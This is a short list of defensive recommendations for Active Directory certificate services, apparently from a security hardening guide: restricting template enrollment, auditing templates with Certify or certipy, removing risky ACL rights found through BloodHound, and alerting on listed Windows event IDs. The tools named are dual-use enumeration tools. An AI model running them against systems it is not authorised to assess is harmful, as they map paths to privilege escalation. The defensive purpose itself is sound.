- Restrict enrollment on client-authentication templates to the accounts that need it, and review every template on a schedule with Certify or certipy find -vulnerable.
- Audit and remove WriteOwner, WriteDacl, GenericWrite and GenericAll edges held by non-administrative principals; BloodHound makes them easy to find.
- Alert on group membership changes (4728/4732/4756), password resets (4724), account changes such as UPN edits (4738), directory object modifications touching msDS-KeyCredentialLink (5136) and CA request/issuance events (4886/4887).